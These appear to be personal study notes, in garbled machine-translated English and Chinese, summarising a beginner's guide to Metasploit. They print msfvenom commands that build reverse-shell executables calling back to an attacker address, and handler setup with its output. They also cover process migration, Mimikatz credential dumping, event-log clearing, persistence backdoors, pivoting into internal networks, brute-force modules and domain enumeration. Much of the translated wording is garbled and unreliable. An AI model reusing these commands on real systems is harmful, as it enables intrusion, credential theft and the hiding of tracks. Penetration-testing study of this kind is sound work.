No work today, in the dark room to read a 100-page book "Metasploit Novice Guide", here to share notes to everyone. You are welcome to criticize and learn to make progress together.
Metasploit Beginner's Guide
笔记kali
0x01
The Metapoit basic file structure is as follows:
Config Metasploit environment configuration information, database configuration information
Data penetration module of some tools and payload, third-party gadget collection, user dictionary and other information
DB Rails compilation generates database information for MSF web framework
Documentation User Description documentation and development documentation
Some basic expansion modules of External Metasploit
Libs Metasploit Some basic classes and third-party module classes
Log Metasploit Some system information and other information at runtime
Modules Metasploit System tool modules, including pre-auxiliary modules (auxiliary), penetration modules (exploits), attack loads (payloads) and rear penetration modules (posts), And an empty field module (Nops) and an encoding module (Encode RS)
Msfinscan to bin file offset address scan
Msfconsole Metasploit's basic command line integrates various functions.
Msfelfscan to the Linux elf file to move the address to scan
。
Msfmachscan function with Msfelfscan
Msfpescan scans the PE format file offset address for Windows.
Msfvenom integrates features of Msfpayload and Msfencode, and is more efficient instead of MSF payload and Msfencode
Plugins Metasploit's third-party plug-in interface.
Scripts Metasploit common post-infiltration module, the difference between the data and the post-infiltration module, do not need to add post parameters and absolute path, can be directly run.
0x02
Search parameters
You can search for your Metasploit. Use the module
Use parameter:
You want to use a payload, or a module that uses the use parameter.
Show Options Parameters
He can see the use of module setup information
Info parameter:
He can see all the detailed information about the module
Set parameters:
He is setting the basic targets option, such as set Target 1
Set Session 1
Back parameter:
If you want to re-select a new use module, you will return with back.
Exit Parameters:
Exit and back, one is return, one is exit
Kill parameter:
Kill a process.
0x03
Scanning phase in order to easily view the results of the scan, you need to open the PostgreSQL database.
Search Portscanner
Use &&
Show Optionns
Run
0x04
Generator Msfvenom
[Email protected]:~# msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.105.1 lport=8099-f exe >shell.exe
0x05
Msfvenom encoding Generation
HTTPS load breaks firewall settings
Payload inject injection load (equivalent to adding another payload to the original session ID to return a new painting ID)
Auto RDP Port Automation open 3389 can also open any port
Inject in memory injection RAM
0x06
Android payload Generation
0x07
Cobaltstrike
A Metasploit-based GUI for the framework of the penetration tool.
0X08 
Meterpreter command is divided into:
1, Core command
2, stdapi file directive
3. STDAPI network instruction  
4, Stdapi user interface Directive
5, STDAPI web Cam command
6, Stdapi file System command
7, Priv Power command
8, priv Password Database command
9, priv Timestamp command
attack win7.
1
[email protected]:/var/www/ html# msfvenom-p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=6745-f exe >win.exe
No Platform was selected, choosing Msf::module::P latform::windows from the payload
No Arch selected, selecting arch : x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size:502 bytes& nbsp
Final size of exe file:73802 bytes
2
MSF > Use Multi/handler
MSF exploit (handler) > Set Payload Windows/meterpreter/reverse_https
Payload = Windows/meterpreter/reverse_https
MSF exploit (handler) > Set Lhost 192.168.105.1
Set Lport 6745
Sessions
Sessions-i 1
Migrate command
Migrating a process from a target machine to another process
Meterpreter > Getpid
Current pid:3232
Meterpreter > Run post/windows/manage/migrate
[] Running module against PC-20170804GGMB
[] Current server Process:win.exe (3232)
[*] Spawning Notepad.exe process to migrate
[+] migrating to 3356
[+] Successfully migrated to process 3356
Script command: RUM_CHECKMV Check whether the remote host is a virtual machine or a real host.
Run Getgui Add user's command
Run VNC look at each other's desktop
Run Packetrecorder-i 0 To view all traffic for the target system and to record the packet.
Load Mimikatz
Clearev clearing the event log
0x09
One: Get Meterpreter.
1 Mr. First into an executable file
[Email protected]:~# msfvenom-p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=8934-f exe > She.exe
-
- No platform was selected, choosing Msf::Module::Platform::Windows from the payload
-
- No Arch selected, selecting Arch: x86 from the payload
-
- No encoder or badchars specified, outputting raw payload
-
- Payload size: 543 bytes
-
- Final size of exe file: 73802 bytes```
-
-
-
- msf > **use multi/handler**
-
- msf exploit(handler) > **set payload windows/meterpreter/reverse_https**
-
- payload => windows/meterpreter/reverse_https
-
- msf exploit(handler) > **set LHOST 192.168.1.105**
-
- LHOST => 192.168.1.105
-
- msf exploit(handler) > **set LPORT 8934**
-
- LPORT => 8934
-
- msf exploit(handler) > **set SessionCommunicationTimeout 0**
-
- SessionCommunicationTimeout => 0
-
- msf exploit(handler) > **set exit0nsession false**
-
- exit0nsession => false
-
- msf exploit(handler) > **exploit -j**
-
-
-
- ---
-
-
-
- 二。Meterpreter基本隧道代理
-
- portfwd是meterpreter提供的一种基本端口转发,portfwd可以反弹单个端口到本地,并且监听。
-
-
-
- pivot是meterpreter的最常用的一种代理,可以轻松把你的机器代理到受害者内网环境下面介绍下pivot使用方法route add添加临时路由表。使用方法:route add添加临时路由表。
-
- 在metasploit添加一个路由表,目的是访问10.1.1.129,将通过meterpreter的会话1来访问。
-
- meterpreter>route
-
- meterpreter>run get_local_subnets 查看路由段
-
- 10.1.1.129 255.255.255.255 1 我们的路由标段是这个
-
- Ms exploit(handler)>route add 10.1.1.129 255.255.255.255 1添加路由至本地
-
- route print
-
-
-
- ===============================
-
- subnet netmask gateway
-
- 10.1.1.129 255.255.255.255 session 1
If you want to proxy 10.1.1.129/24 to session 1, you can write this.
Pivot has been configured here, you scan the 10.1.1.129 in MSF (DB_NMAP) or Access (Psexe module, SSH module) will be accessed through the proxy session 1 This reply, if you want to use this agent through other applications, what to do? With Metasploit socks4a, you can provide an I-listen tunnel for other applications to access.
First use sockes4a and configure, listen port
MSF > Use AUXILIARY/SERVER/SOCKS4A
MSF auxiliary (SOCKS4A) > Show options
Module Options (AUXILIARY/SERVER/SOCKS4A):
Name Current Setting Required Description
---- --------------- -------- -----------
Srvhost 0.0.0.0 yes the address to listen on
Srvport yes the port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
MSF auxiliary (SOCKS4A) > Exploit-y
[] Auxiliary module execution completed
MSF auxiliary (SOCKS4A) >
[] Starting the SOCKS4A proxy server
To view the listening port:
MSF auxiliary (SOCKS4A) > Netstat-ano | grep "1080"
[*] Exec:netstat-ano | grep "1080"
TCP 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
Port is already listening, then configure Proxychains
0x10
Rights maintenance. Metasploit back door is not easy to use, we recommend to take control of access to the external third-party backdoor.
An MSF comes with a backdoor.
Persistence
Metsvc
Scheduleme & Schtasks
0x11
Information gathering
To be good at gathering information and to have a good view of the results, then we have to do the following three steps to start Msfconsole: Start the database; view the database; link the database.
Port Scan: Search Portscan
Currently two scan modes: SYN/TCP
Smb_version to identify the version of Windows
Use Auxiliary/scanner/smb/smb_version
Mssql_ping default MSSQL will listen to 1433 port or a random TCP port, if listening to a random port, you can use UDP on the 1433 port to query specifically which port is listening.
Use auxiliary/scanner/mssql/mssql_ping
Ssh_version identifying the SSH software version
Auxiliary/scanner/ssh/ssh_version
Ftp_version looking for FTP server in Target network
Brute Force hack
Kali with a dictionary path
/usr/share/metasploit-framework/data/wordlists
Auxiliary/scanner/mysql/mysql_login
Auxiliary/scanner/http/tomcat_mgr_login
Assuming that the Tomcat account password is successfully exploded, the following shell can be taken:
Exploit/multi/http/tomcat_mgr_deploy
Metasploit Common probing Service module:
* * Port Scan * *
Auxiliary/scanner/portscan
Scanner/portscan/ack
Scanner/portscan/ftpbounce FTP Hop port scan
Scanner/portscan/syn
Scanner/portscan/tcp
Scanner/portscan/xmss TCP "XMSS" Port scan
SMB Scan
Auxiliary/scanner/smb/smb_enumusers SMB Enumeration
Auxiliary/scanner/smb/pipe_dcerpc_auditor return DCERPC Information
AUXILIARY/SCANNER/SMB/SMB2 Scan SMB2 Protocol
Auxiliary/scanner/smb/smb_enumshares scanning SMB shared files
Auxiliary/scanner/smb/smb_enumusers enumerating users on the system
Auxiliary/scanner/smb/smb_login SMB Logon
Use windows/smb/psexec SMB Login
Auxiliary/scanner/smb/smb_lookupsid users of the scan group
Auxiliary/scanner/smb/smb_version Scan System version
MSSQL Scan
Admin/mssql/mssql_enum MSSQL Enumeration
Admin/mssql/mssql_exec MSSQL Executive Order
Admin/mssql/mssql_sql MSSQL Query
Scanner/mssql/mssql_login MSSQL Login Tool
There's also a mssql_payload module
SMTP Scan
Auxiliary/scanner/smtp/smtp_enum SMTP Enumeration
Auxiliary/scanner/smtp/smtp_version Scanning SMTP versions
SNMP Scan
Auxiliary/scanner/snmap/community through SNMP scanning devices
Scanner/snmap/community SNMP Scan
SSH scan
Auxiliary/scanner/ssh/ssh_login SSH Login
Auxiliary/scanner/ssh/ssh_login_pubkey SSH Public key authentication Login
Auxiliary/scanner/ssh/ssh_version Scan SSH version test
Telnet scan
Auxiliary/scanner/telnet/telnet_login Telnet Login
Auxiliary/scanner/telnet/telnet_version Telnet version
TFTP scan
Auxiliary/scanner/tftp/tftpbrute Scanning TFTP files
Scanner/ftp/anonymous FTP version Scan
ARP Scan
Auxiliary/scanner/discovery/arp_sweep
Auxiliary/scanner/discovery/udp_prode Scanning UDP Service Host
Auxiliary/scanner/discovery/udp_sweep detection of commonly used UDP services
Auxiliary/sniffer/psnuffle Sniffer password
Scanner/vnc/vnc_none_auth VNC Service No authentication scan module
Web server information Scanning module
Auxiliary/scanner/http below the http_version,open_proxy,robots_txt,frontpage_login,tomcat_administration,tomcat_utf8_ Traversal,options,drupal_views_user_enum,scraper,svn_scanner,trace,vhost_scanner,webdav_internal_ip,webdav_ Scanner,webdav_website_content
File directory Scan Module
auxiliary/scanner/http/under the Backup_file,brute_dirs,copy_of_file,dir_listing,dir_scanner,dir_webdav_unicode_bypass , File_sanme_dir,files_dir,http_put,ms09_020_webdav_unicode_bypass,prev_dir_same_name_file,replace_ext,soap_xml , Trace_axd,verb__auth_bypass
Auxiliary/scanner/dos/http/apache_range_dos
Web Application Scan Module
Auxiliary/scanner/http/blind_sql_query
Auxiliary/scanner/http/error_sql_injection
Auxiliary/scanner/http/http_tracersal
Auxiliary/scanner/http/rails_mass_assignment
Exploit/multi/http/lcms_php_exec
0x12
Bounce Meterpreter
Try to claim 2012 servers
Try current account bypass right
NET User/domain
NET group "domain Computer"/domain
NET Group "Domain Admins"/domain View Domain Admins
net localgroup Administrators
NET View/domain
Information analysis get one server permission
Mimikaz fetching plaintext
View details of crawled users net user Xxx/domain
Attempt to use domain token impersonation
Leveraging SMB Delivery
1 Use the currently acquired two user rights to quickly scan
2smb_login Scan
3 Port forwarding into intranet
4meterpreter Port Forwarding
SOCKS4A Forwarding of 5MSF
+https://www.zybuluo.com/jasun/note/841229 good, I want to eat, hungry,.
Metasploit Quick Start